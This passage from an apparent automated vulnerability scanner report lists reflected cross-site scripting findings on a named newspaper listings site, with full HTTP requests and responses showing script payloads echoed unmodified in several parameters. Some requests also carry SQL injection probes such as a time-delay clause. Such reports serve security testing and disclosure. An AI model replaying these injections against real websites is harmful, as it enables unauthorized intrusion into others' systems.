This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

POST /BusinessDirectory/List_Listings.asp HTTP/1.1
Referer: http://listings.nytimes.com/BusinessDirectory/List_Listings.asp
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322;)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: listings.nytimes.com
Cookie: ASPSESSIONIDSCDTQSBS=CIDMHLFAMCCFKPLBBHALLAAF; ASPSESSIONIDACCRTTDT=EHDHDNGAFBGCHINIICBALKAB; ASPSESSIONIDSCBSSQAT=IBNKJLNDLPHGNPGDKFHLPIOI; ASPSESSIONIDCADQTTDT=ENMHKJGAMFJMFIFDNFGMGMOE; ASPSESSIONIDSABRQSAS=FELKNADAPLOANHOJMNHCBFEN; ASPSESSIONIDCCDTSTDT=JFOLPOGAMCPNEGJMKEMOJBLJ; ASPSESSIONIDSCCSTRAT=EDDDEGAAKEEOJFIKLGKLFKHO; ASPSESSIONIDCADTSTCS=KDIPGLGAPHDILBCBFEABDOGA
Accept-Encoding: gzip, deflate
Content-Length: 391

AdTagCountyId=1 AND 'NS='ss5ef5f<script>alert(1)</script>891192eefff&AdTagPriceIndx=3&Amenities=3&CategoryId=BIZDIR&ChangeEmail=netsparker%40example.com&ctRS=10&GroupId=3&intl=3&KeyWord=3&Lid=3&LIndex=3&RegionId=3&SoL=3&strLsId=80-N1011083%2c80-N1009073%2c80-N906131%2
...[SNIP]...

Response

HTTP/1.1 200 OK
Date: Mon, 15 Nov 2010 07:22:14 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 465
Content-Type: text/html
Cache-control: private

<h1>Form</h1>AdTagCountyId=1 AND 'NS='ss5ef5f<script>alert(1)</script>891192eefff&AdTagPriceIndx=3&Amenities=3&CategoryId=BIZDIR&ChangeEmail=netsparker%40example.com&ctRS=10&GroupId=3&intl=3&KeyWord=3&Lid=3&LIndex=3&RegionId=3&SoL=3&strLsId=80-N1011083%2c80-N1009073%2c80-N906131%2c
...[SNIP]...

4.182. http://listings.nytimes.com/BusinessDirectory/List_Listings.asp [AdTagPriceIndx parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://listings.nytimes.com
Path:   /BusinessDirectory/List_Listings.asp

Issue detail

The value of the AdTagPriceIndx request parameter is copied into the HTML document as plain text between tags. The payload bed0b<script>alert(1)</script>88d4418c010 was submitted in the AdTagPriceIndx parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

POST /BusinessDirectory/List_Listings.asp HTTP/1.1
Referer: http://listings.nytimes.com/BusinessDirectory/List_Listings.asp
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322;)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: listings.nytimes.com
Cookie: ASPSESSIONIDSCDTQSBS=CIDMHLFAMCCFKPLBBHALLAAF; ASPSESSIONIDACCRTTDT=EHDHDNGAFBGCHINIICBALKAB; ASPSESSIONIDSCBSSQAT=IBNKJLNDLPHGNPGDKFHLPIOI; ASPSESSIONIDCADQTTDT=ENMHKJGAMFJMFIFDNFGMGMOE; ASPSESSIONIDSABRQSAS=FELKNADAPLOANHOJMNHCBFEN; ASPSESSIONIDCCDTSTDT=JFOLPOGAMCPNEGJMKEMOJBLJ; ASPSESSIONIDSCCSTRAT=EDDDEGAAKEEOJFIKLGKLFKHO; ASPSESSIONIDCADTSTCS=KDIPGLGAPHDILBCBFEABDOGA
Accept-Encoding: gzip, deflate
Content-Length: 391

AdTagCountyId=1 AND 'NS='ss&AdTagPriceIndx=3bed0b<script>alert(1)</script>88d4418c010&Amenities=3&CategoryId=BIZDIR&ChangeEmail=netsparker%40example.com&ctRS=10&GroupId=3&intl=3&KeyWord=3&Lid=3&LIndex=3&RegionId=3&SoL=3&strLsId=80-N1011083%2c80-N1009073%2c80-N906131%2c80-N1011114%2c80
...[SNIP]...

Response

HTTP/1.1 200 OK
Date: Mon, 15 Nov 2010 07:22:17 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 465
Content-Type: text/html
Cache-control: private

<h1>Form</h1>AdTagCountyId=1 AND 'NS='ss&AdTagPriceIndx=3bed0b<script>alert(1)</script>88d4418c010&Amenities=3&CategoryId=BIZDIR&ChangeEmail=netsparker%40example.com&ctRS=10&GroupId=3&intl=3&KeyWord=3&Lid=3&LIndex=3&RegionId=3&SoL=3&strLsId=80-N1011083%2c80-N1009073%2c80-N906131%2c80-N1011114%2c80-
...[SNIP]...

4.183. http://listings.nytimes.com/BusinessDirectory/List_Listings.asp [AdTagPriceIndx parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://listings.nytimes.com
Path:   /BusinessDirectory/List_Listings.asp

Issue detail

The value of the AdTagPriceIndx request parameter is copied into the HTML document as plain text between tags. The payload d0174<script>alert(1)</script>5d9aae33f2e8c9585 was submitted in the AdTagPriceIndx parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The original request used the POST method; however, it was possible to convert the request to use the GET method to enable easier demonstration and delivery of the attack.

Request

GET /BusinessDirectory/List_Listings.asp?ChangeEmail=%27;WAITFOR%20DELAY%20%270:0:25%27--&KeyWord=--+Keyword+--&RegionId=3&SubCatId=3&AdTagCountyId=3&AdTagPriceIndx=3d0174<script>alert(1)</script>5d9aae33f2e8c9585&Amenities=3&CategoryId=BIZDIR&ChangeEmail=netsparker%40example.com&ctRS=10&GroupId=3&intl=3&KeyWord=3&Lid=3&LIndex=3&RegionId=3&SoL=3&strLsId=80-N1011083%2c80-N1009073%2c80-N906131%2c80-N1011114%2c80-N1011021%2c80-N1008162%2c80-N1011102%2c80-N1009292%2c80-N1011022%2c80-N1010281&strStates=3&SubCatId=3&UserEmail=netsparker%40example.com&UserPwd=3 HTTP/1.1
Referer: http://listings.nytimes.com/BusinessDirectory/List_Listings.asp?ChangeEmail=&KeyWord=--+Keyword+--&RegionId=&SubCatId=
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322;)
Cache-Control: no-cache
Host: listings.nytimes.com
Cookie: ASPSESSIONIDSCDTQSBS=CIDMHLFAMCCFKPLBBHALLAAF; ASPSESSIONIDACCRTTDT=EHDHDNGAFBGCHINIICBALKAB; ASPSESSIONIDSCBSSQAT=IBNKJLNDLPHGNPGDKFHLPIOI; ASPSESSIONIDCADQTTDT=ENMHKJGAMFJMFIFDNFGMGMOE; ASPSESSIONIDSABRQSAS=FELKNADAPLOANHOJMNHCBFEN; ASPSESSIONIDCCDTSTDT=JFOLPOGAMCPNEGJMKEMOJBLJ; ASPSESSIONIDSCCSTRAT=EDDDEGAAKEEOJFIKLGKLFKHO
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Mon, 15 Nov 2010 07:31:56 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 552
Content-Type: text/html
Set-Cookie: ASPSESSIONIDACATSTCS=KFKJLAHAPGBLLLHFLPCBHNEP; path=/
Cache-control: private

<h1>Form</h1><h1>QueryString</h1>ChangeEmail=%27;WAITFOR%20DELAY%20%270:0:25%27--&KeyWord=--+Keyword+--&RegionId=3&SubCatId=3&AdTagCountyId=3&AdTagPriceIndx=3d0174<script>alert(1)</script>5d9aae33f2e8c9585&Amenities=3&CategoryId=BIZDIR&ChangeEmail=netsparker%40example.com&ctRS=10&GroupId=3&intl=3&KeyWord=3&Lid=3&LIndex=3&RegionId=3&SoL=3&strLsId=80-N1011083%2c80-N1009073%2c80-N906131%2c80-N1011114%2c80-
...[SNIP]...

4.184. http://listings.nytimes.com/BusinessDirectory/List_Listings.asp [Amenities parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://listings.nytimes.com
Path:   /BusinessDirectory/List_Listings.asp

Issue detail

The value of the Amenities request parameter is copied into the HTML document as plain text between tags. The payload 6b529<script>alert(1)</script>2d5124fe105042a4 was submitted in the Amenities parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The original request used the POST method; however, it was possible to convert the request to use the GET method to enable easier demonstration and delivery of the attack.

Request

GET /BusinessDirectory/List_Listings.asp?ChangeEmail=%27;WAITFOR%20DELAY%20%270:0:25%27--&KeyWord=--+Keyword+--&RegionId=3&SubCatId=3&AdTagCountyId=3&AdTagPriceIndx=3&Amenities=36b529<script>alert(1)</script>2d5124fe105042a4&CategoryId=BIZDIR&ChangeEmail=netsparker%40example.com&ctRS=10&GroupId=3&intl=3&KeyWord=3&Lid=3&LIndex=3&RegionId=3&SoL=3&strLsId=80-N1011083%2c80-N1009073%2c80-N906131%2c80-N1011114%2c80-N1011021%2c80-N1008162%2c80-N1011102%2c80-N1009292%2c80-N1011022%2c80-N1010281&strStates=3&SubCatId=3&UserEmail=netsparker%40example.com&UserPwd=3 HTTP/1.1
Referer: http://listings.nytimes.com/BusinessDirectory/List_Listings.asp?ChangeEmail=&KeyWord=--+Keyword+--&RegionId=&SubCatId=
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322;)
Cache-Control: no-cache
Host: listings.nytimes.com
Cookie: ASPSESSIONIDSCDTQSBS=CIDMHLFAMCCFKPLBBHALLAAF; ASPSESSIONIDACCRTTDT=EHDHDNGAFBGCHINIICBALKAB; ASPSESSIONIDSCBSSQAT=IBNKJLNDLPHGNPGDKFHLPIOI; ASPSESSIONIDCADQTTDT=ENMHKJGAMFJMFIFDNFGMGMOE; ASPSESSIONIDSABRQSAS=FELKNADAPLOANHOJMNHCBFEN; ASPSESSIONIDCCDTSTDT=JFOLPOGAMCPNEGJMKEMOJBLJ; ASPSESSIONIDSCCSTRAT=EDDDEGAAKEEOJFIKLGKLFKHO
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Mon, 15 Nov 2010 07:32:44 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 551
Content-Type: text/html
Set-Cookie: ASPSESSIONIDACATSTCS=OIKJLAHAKALONFALIMIHHCBG; path=/
Cache-control: private

<h1>Form</h1><h1>QueryString</h1>ChangeEmail=%27;WAITFOR%20DELAY%20%270:0:25%27--&KeyWord=--+Keyword+--&RegionId=3&SubCatId=3&AdTagCountyId=3&AdTagPriceIndx=3&Amenities=36b529<script>alert(1)</script>2d5124fe105042a4&CategoryId=BIZDIR&ChangeEmail=netsparker%40example.com&ctRS=10&GroupId=3&intl=3&KeyWord=3&Lid=3&LIndex=3&RegionId=3&SoL=3&strLsId=80-N1011083%2c80-N1009073%2c80-N906131%2c80-N1011114%2c80-N1011021%2c8
...[SNIP]...

4.185. http://listings.nytimes.com/BusinessDirectory/List_Listings.asp [Amenities parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://listings.nytimes.com
Path:   /BusinessDirectory/List_Listings.asp

Issue detail

The value of the Amenities request parameter is copied into the HTML document as plain text between tags. The payload af9ff<script>alert(1)</script>55718c59716 was submitted in the Amenities parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

POST /BusinessDirectory/List_Listings.asp HTTP/1.1
Referer: http://listings.nytimes.com/BusinessDirectory/List_Listings.asp
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322;)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: listings.nytimes.com
Cookie: ASPSESSIONIDSCDTQSBS=CIDMHLFAMCCFKPLBBHALLAAF; ASPSESSIONIDACCRTTDT=EHDHDNGAFBGCHINIICBALKAB; ASPSESSIONIDSCBSSQAT=IBNKJLNDLPHGNPGDKFHLPIOI; ASPSESSIONIDCADQTTDT=ENMHKJGAMFJMFIFDNFGMGMOE; ASPSESSIONIDSABRQSAS=FELKNADAPLOANHOJMNHCBFEN; ASPSESSIONIDCCDTSTDT=JFOLPOGAMCPNEGJMKEMOJBLJ; ASPSESSIONIDSCCSTRAT=EDDDEGAAKEEOJFIKLGKLFKHO; ASPSESSIONIDCADTSTCS=KDIPGLGAPHDILBCBFEABDOGA
Accept-Encoding: gzip, deflate
Content-Length: 391

AdTagCountyId=1 AND 'NS='ss&AdTagPriceIndx=3&Amenities=3af9ff<script>alert(1)</script>55718c59716&CategoryId=BIZDIR&ChangeEmail=netsparker%40example.com&ctRS=10&GroupId=3&intl=3&KeyWord=3&Lid=3&LIndex=3&RegionId=3&SoL=3&strLsId=80-N1011083%2c80-N1009073%2c80-N906131%2c80-N1011114%2c80-N1011021%2c
...[SNIP]...

Response

HTTP/1.1 200 OK
Date: Mon, 15 Nov 2010 07:22:19 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 465
Content-Type: text/html
Cache-control: private

<h1>Form</h1>AdTagCountyId=1 AND 'NS='ss&AdTagPriceIndx=3&Amenities=3af9ff<script>alert(1)</script>55718c59716&CategoryId=BIZDIR&ChangeEmail=netsparker%40example.com&ctRS=10&GroupId=3&intl=3&KeyWord=3&Lid=3&LIndex=3&RegionId=3&SoL=3&strLsId=80-N1011083%2c80-N1009073%2c80-N906131%2c80-N1011114%2c80-N1011021%2c8
...[SNIP]...

4.186. http://listings.nytimes.com/BusinessDirectory/List_Listings.asp [CategoryId parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://listings.nytimes.com
Path:   /BusinessDirectory/List_Listings.asp

Issue detail

The value of the CategoryId request parameter is copied into the HTML document as plain text between tags. The payload 4860b<script>alert(1)</script>626b282daaf was submitted in the CategoryId parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

POST /BusinessDirectory/List_Listings.asp HTTP/1.1
Referer: http://listings.nytimes.com/BusinessDirectory/List_Listings.asp
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322;)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: listings.nytimes.com
Cookie: ASPSESSIONIDSCDTQSBS=CIDMHLFAMCCFKPLBBHALLAAF; ASPSESSIONIDACCRTTDT=EHDHDNGAFBGCHINIICBALKAB; ASPSESSIONIDSCBSSQAT=IBNKJLNDLPHGNPGDKFHLPIOI; ASPSESSIONIDCADQTTDT=ENMHKJGAMFJMFIFDNFGMGMOE; ASPSESSIONIDSABRQSAS=FELKNADAPLOANHOJMNHCBFEN; ASPSESSIONIDCCDTSTDT=JFOLPOGAMCPNEGJMKEMOJBLJ; ASPSESSIONIDSCCSTRAT=EDDDEGAAKEEOJFIKLGKLFKHO; ASPSESSIONIDCADTSTCS=KDIPGLGAPHDILBCBFEABDOGA
Accept-Encoding: gzip, deflate
Content-Length: 391

AdTagCountyId=1 AND 'NS='ss&AdTagPriceIndx=3&Amenities=3&CategoryId=BIZDIR4860b<script>alert(1)</script>626b282daaf&ChangeEmail=netsparker%40example.com&ctRS=10&GroupId=3&intl=3&KeyWord=3&Lid=3&LIndex=3&RegionId=3&SoL=3&strLsId=80-N1011083%2c80-N1009073%2c80-N906131%2c80-N1011114%2c80-N1011021%2c80-N1008162%2c80-N
...[SNIP]...

Response

HTTP/1.1 200 OK
Date: Mon, 15 Nov 2010 07:22:22 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 465
Content-Type: text/html
Cache-control: private

<h1>Form</h1>AdTagCountyId=1 AND 'NS='ss&AdTagPriceIndx=3&Amenities=3&CategoryId=BIZDIR4860b<script>alert(1)</script>626b282daaf&ChangeEmail=netsparker%40example.com&ctRS=10&GroupId=3&intl=3&KeyWord=3&Lid=3&LIndex=3&RegionId=3&SoL=3&strLsId=80-N1011083%2c80-N1009073%2c80-N906131%2c80-N1011114%2c80-N1011021%2c80-N1008162%2c80-N1
...[SNIP]...

4.187. http://listings.nytimes.com/BusinessDirectory/List_Listings.asp [CategoryId parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://listings.nytimes.com
Path:   /BusinessDirectory/List_Listings.asp

Issue detail

The value of the CategoryId request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 17a59"><script>alert(1)</script>e4b9c9d10edc54c92 was submitted in the CategoryId parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The original request used the POST method; however, it was possible to convert the request to use the GET method to enable easier demonstration and delivery of the attack.

Request

GET /BusinessDirectory/List_Listings.asp?AdTagCountyId=&AdTagPriceIndx=&CategoryId=BIZDIR17a59"><script>alert(1)</script>e4b9c9d10edc54c92&ChangeEmail=&cid=999&DOrder=A&GroupId=&intl=&KeyWord=&LastPage=40&LOrder=A&NOrder=A&Order=A&POrder=A&RegionId=&ROrder=A&RSCount=2500&sLsIds0=80-N1011083%2c80-N1009073%2c80-N906131%2c80-N1011114%2c80-N1011021%2c80-N1008162%2c80-N1011102%2c80-N1009292%2c80-N1011022%2c80-N1010281&sLsIds1=80-N1010223%2c80-N1010192%2c80-N1011111%2c80-N1011051%2c80-N1010272%2c80-N1011071%2c80-N1009282%2c80-N1010211%2c80-N1011121%2c80-N1009242&sLsIds2=80-N1010218%2c20-1000297132_020%2c125-454145%2c125-500168%2c125-561603%2c125-557500%2c125-505633%2c125-502057%2c125-569378%2c125-451879&sLsIds3=125-563290%2c125-492069%2c125-487258%2c125-473954%2c125-516760%2c125-529105%2c125-529136%2c125-565044%2c125-452044%2c125-471500&sLsIds4=125-558791%2c125-555521%2c125-561463%2c125-549434%2c125-434068%2c125-530728%2c125-564022%2c125-557581%2c125-560091%2c125-563157&sLsIds5=125-491745%2c125-547950%2c125-509222%2c125-568138%2c125-557766%2c125-559177%2c125-537020%2c125-506111%2c125-560157%2c125-566240&sLsIds6=125-557675%2c125-551396%2c125-559267%2c125-533573%2c125-458445%2c125-538467%2c125-471913%2c125-482897%2c125-535950%2c125-499401&sLsIds7=125-486445%2c125-529496%2c125-429362%2c125-501989%2c125-502772%2c125-534073%2c125-530131%2c125-494155%2c125-517168%2c125-557932&sLsIds8=125-514452%2c125-541145%2c125-416753%2c125-444446%2c125-537604%2c125-502641%2c125-567841%2c125-564153%2c20-1000290506_030%2c125-570359&sLsIds9=125-539476%2c125-431610%2c125-442946%2c125-560310%2c125-497124%2c125-529949%2c125-568533%2c125-558371%2c125-553006%2c125-553112&sLsIdsA=125-560826%2c125-549432%2c125-552794%2c125-545063%2c125-552800%2c125-549795%2c125-552790%2c125-552796%2c125-551814%2c125-545983&sLsIdsAA=125-553610%2c125-518851%2c125-553607%2c125-556074%2c125-558240%2c125-499512%2c125-526065%2c125-462985%2c125-544762%2c125-560817&sLsIdsAB=125-522621%2c125-567005%2c125-364577%2c125-333056%2c125-565752%2c125-389754%2c125-405051%2c125-558962%2c125-441721%2c125-542506&sLsIdsAC=125-521855%2c125-495755%2c125-503906%2c125-565552%2c125-556750%2c125-475131%2c125-202650%2c125-510030%2c125-570191%2c125-475695&sLsIdsAD=125-555585%2c125-565528%2c125-520249%2c125-541247%2c125-556121%2c125-547008%2c125-568447%2c125-545194%2c125-512492%2c125-297311&sLsIdsB=125-551828%2c125-552791%2c125-552803%2c125-453304%2c125-552666%2c125-521482%2c125-521477%2c125-521479%2c125-488823%2c125-545359&sLsIdsC=125-527579%2c125-525464%2c125-527584%2c125-475581%2c125-510064%2c125-565038%2c125-554987%2c125-559008%2c125-525927%2c125-526128&sLsIdsD=125-526018%2c125-526144%2c125-529057%2c125-567748%2c125-526023%2c125-555190%2c125-559612%2c125-555175%2c125-554984%2c125-547837&sLsIdsE=125-547750%2c125-548054%2c125-525923%2c125-494906%2c125-531825%2c125-550469%2c125-567828%2c125-490106%2c125-566918%2c125-529618&sLsIdsF=125-463922%2c125-464100%2c125-488817%2c125-557391%2c125-522086%2c125-548195%2c125-553895%2c125-558344%2c125-564715%2c125-556870&sLsIdsG=125-554611%2c125-518058%2c125-532291%2c125-532292%2c125-482057%2c125-569094%2c125-555551%2c125-462478%2c125-469804%2c125-500828&sLsIdsH=125-504736%2c125-521946%2c125-517146%2c125-518850%2c125-524081%2c125-527129%2c125-527511%2c125-527508%2c125-528677%2c125-533450&sLsIdsI=125-540051%2c125-544122%2c125-549166%2c125-546131%2c125-550891%2c125-563445%2c125-560883%2c125-560309%2c125-565198%2c125-565179&sLsIdsJ=125-566478%2c125-566482%2c125-564856%2c125-565126%2c125-569444%2c125-531599%2c125-550866%2c125-560171%2c125-539587%2c125-567941&sLsIdsK=125-566956%2c125-513013%2c125-493766%2c125-521916%2c125-522018%2c125-554134%2c125-521507%2c125-521264%2c125-541992%2c125-521281&sLsIdsL=125-557904%2c125-565259%2c125-442451%2c125-551241%2c125-488296%2c125-568500%2c125-569515%2c125-548226%2c125-559444%2c125-565130&sLsIdsM=125-395953%2c125-491487%2c125-444457%2c125-464308%2c125-454440%2c125-454446%2c125-472602%2c125-418913%2c125-422194%2c125-561731&sLsIdsN=125-483424%2c125-471203%2c125-430646%2c125-436208%2c125-561736%2c125-394065%2c125-539553%2c125-454345%2c125-463424%2c125-470693&sLsIdsO=125-470909%2c125-481310%2c125-486834%2c125-490712%2c125-419767%2c125-497400%2c125-561713%2c125-496638%2c125-498359%2c125-499448&sLsIdsP=125-499423%2c125-499451%2c125-500061%2c125-500014%2c125-501827%2c125-504342%2c125-505889%2c125-505964%2c125-507572%2c125-561739&sLsIdsQ=125-512454%2c125-531166%2c125-510950%2c125-519482%2c125-550392%2c125-486912%2c125-560934%2c125-555722%2c125-562036%2c125-555902&sLsIdsR=125-493413%2c125-548107%2c125-566195%2c125-549209%2c125-496651%2c125-550801%2c125-551463%2c125-564528%2c125-544691%2c125-511935&sLsIdsS=125-513610%2c125-514528%2c125-514558%2c125-518925%2c125-534894%2c125-519626%2c125-521135%2c125-521146%2c125-531280%2c125-524507&sLsIdsT=125-524511%2c125-548214%2c125-523820%2c125-561740%2c125-535592%2c125-526559%2c125-561743%2c125-543364%2c125-526572%2c125-535768&sLsIdsU=125-561744%2c125-540337%2c125-530055%2c125-539271%2c125-533352%2c125-534277%2c125-554091%2c125-535784%2c125-536134%2c125-536168&sLsIdsV=125-537139%2c125-538939%2c125-537922%2c125-561745%2c125-540042%2c125-542538%2c125-561832%2c125-560772%2c125-561851%2c125-554861&sLsIdsW=125-545138%2c125-561852%2c125-561853%2c125-561855%2c125-561856%2c125-561860%2c125-553593%2c125-561861%2c125-557156%2c125-561863&sLsIdsX=125-560787%2c125-555117%2c125-555993%2c125-560783%2c125-558689%2c125-557187%2c125-557539%2c125-560788%2c125-560650%2c125-562241&sLsIdsY=125-564252%2c125-472625%2c125-565009%2c125-565408%2c125-565406%2c125-566364%2c125-566155%2c125-566429%2c125-569520%2c125-560929&sLsIdsZ=125-490731%2c125-505509%2c125-552073%2c125-512867%2c125-528218%2c125-528217%2c125-546102%2c125-564120%2c125-564628%2c125-528175&SoL=&SOrder=A&Sort=D&strRegion=all+areas&strRegions=5%2bAll+Areas%3a%3a50000%2bAlabama%3a%3a51000%2bAlaska%3a%3a52000%2bArizona%3a%3a53000%2bArkansas%3a%3a54100%2bCalifornia%3a%3a55000%2bColorado%3a%3a56000%2bConnecticut%3a%3a57000%2bDelaware%3a%3a59100%2bFlorida%3a%3a60000%2bGeorgia%3a%3a61000%2bHawaii%3a%3a62000%2bIdaho%3a%3a63000%2bIllinois%3a%3a64000%2bIndiana%3a%3a65000%2bIowa%3a%3a66000%2bKansas%3a%3a67000%2bKentucky%3a%3a68100%2bLouisiana%3a%3a69000%2bMaine%3a%3a70000%2bMaryland%3a%3a71200%2bMassachusetts%3a%3a72000%2bMichigan%3a%3a73000%2bMinnesota%3a%3a74000%2bMississippi%3a%3a75000%2bMissouri%3a%3a76000%2bMontana%3a%3a77000%2bNebraska%3a%3a78100%2bNevada%3a%3a79000%2bNew+Hampshire%3a%3a80100%2bNew+Jersey%3a%3a81000%2bNew+Mexico%3a%3a2022%2bNew+York%3a%3a82400%2bNew+York+City+Metro+Area%3a%3a83000%2bNorth+Carolina%3a%3a84000%2bNorth+Datoka%3a%3a85000%2bOhio%3a%3a86000%2bOklahoma%3a%3a87000%2bOregon%3a%3a88000%2bPennsylvania%3a%3a89000%2bRhode+Island%3a%3a90000%2bSouth+Carolina%3a%3a91000%2bSouth+Dakota%3a%3a92000%2bTennessee%3a%3a93000%2bTexas%3a%3a94000%2bUtah%3a%3a95000%2bVermont%3a%3a96000%2bVirginia%3a%3a97000%2bWashington%3a%3a58000%2bWashington+D.C.%3a%3a98000%2bWest+Virginia%3a%3a99000%2bWisconsin%3a%3a100000%2bWyoming%3a%3a&strSQL3=Execute+uspSearchListingsByLsIds+'BIZDIR'%2c&strStates=&SubCatId=&ThisPage=1 HTTP/1.1
Referer: http://listings.nytimes.com/BusinessDirectory/List_Listings.asp
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322;)
Cache-Control: no-cache
Host: listings.nytimes.com
Cookie: ASPSESSIONIDSCDTQSBS=CIDMHLFAMCCFKPLBBHALLAAF
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Mon, 15 Nov 2010 07:21:42 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 82707
Content-Type: text/html
Set-Cookie: ASPSESSIONIDCCDTSTDT=CJOLPOGABELCKMMDCFDCLJPA; path=/
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >

   
   <head>
       <meta http-equi
...[SNIP]...
<a href="javascript:openPhoto('http://listings.nytimes.com/Redesign/+ComShare/photoimage.asp?Lid=80-N1011083&CategoryId=BIZDIR17a59"><script>alert(1)</script>e4b9c9d10edc54c92');">
...[SNIP]...

4.188. http://listings.nytimes.com/BusinessDirectory/List_Listings.asp [ChangeEmail parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://listings.nytimes.com
Path:   /BusinessDirectory/List_Listings.asp

Issue detail

The value of the ChangeEmail request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ec6f6"><script>alert(1)</script>d6a14042115a5cc08 was submitted in the ChangeEmail parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The original request used the POST method; however, it was possible to convert the request to use the GET method to enable easier demonstration and delivery of the attack.

Request

GET /BusinessDirectory/List_Listings.asp?AdTagCountyId=&AdTagPriceIndx=&CategoryId=BIZDIR&ChangeEmail=ec6f6"><script>alert(1)</script>d6a14042115a5cc08&cid=999&DOrder=A&GroupId=&intl=&KeyWord=&LastPage=40&LOrder=A&NOrder=A&Order=A&POrder=A&RegionId=&ROrder=A&RSCount=2500&sLsIds0=80-N1011083%2c80-N1009073%2c80-N906131%2c80-N1011114%2c80-N1011021%2c80-N1008162%2c80-N1011102%2c80-N1009292%2c80-N1011022%2c80-N1010281&sLsIds1=80-N1010223%2c80-N1010192%2c80-N1011111%2c80-N1011051%2c80-N1010272%2c80-N1011071%2c80-N1009282%2c80-N1010211%2c80-N1011121%2c80-N1009242&sLsIds2=80-N1010218%2c20-1000297132_020%2c125-454145%2c125-500168%2c125-561603%2c125-557500%2c125-505633%2c125-502057%2c125-569378%2c125-451879&sLsIds3=125-563290%2c125-492069%2c125-487258%2c125-473954%2c125-516760%2c125-529105%2c125-529136%2c125-565044%2c125-452044%2c125-471500&sLsIds4=125-558791%2c125-555521%2c125-561463%2c125-549434%2c125-434068%2c125-530728%2c125-564022%2c125-557581%2c125-560091%2c125-563157&sLsIds5=125-491745%2c125-547950%2c125-509222%2c125-568138%2c125-557766%2c125-559177%2c125-537020%2c125-506111%2c125-560157%2c125-566240&sLsIds6=125-557675%2c125-551396%2c125-559267%2c125-533573%2c125-458445%2c125-538467%2c125-471913%2c125-482897%2c125-535950%2c125-499401&sLsIds7=125-486445%2c125-529496%2c125-429362%2c125-501989%2c125-502772%2c125-534073%2c125-530131%2c125-494155%2c125-517168%2c125-557932&sLsIds8=125-514452%2c125-541145%2c125-416753%2c125-444446%2c125-537604%2c125-502641%2c125-567841%2c125-564153%2c20-1000290506_030%2c125-570359&sLsIds9=125-539476%2c125-431610%2c125-442946%2c125-560310%2c125-497124%2c125-529949%2c125-568533%2c125-558371%2c125-553006%2c125-553112&sLsIdsA=125-560826%2c125-549432%2c125-552794%2c125-545063%2c125-552800%2c125-549795%2c125-552790%2c125-552796%2c125-551814%2c125-545983&sLsIdsAA=125-553610%2c125-518851%2c125-553607%2c125-556074%2c125-558240%2c125-499512%2c125-526065%2c125-462985%2c125-544762%2c125-560817&sLsIdsAB=125-522621%2c125-567005%2c125-364577%2c125-333056%2c
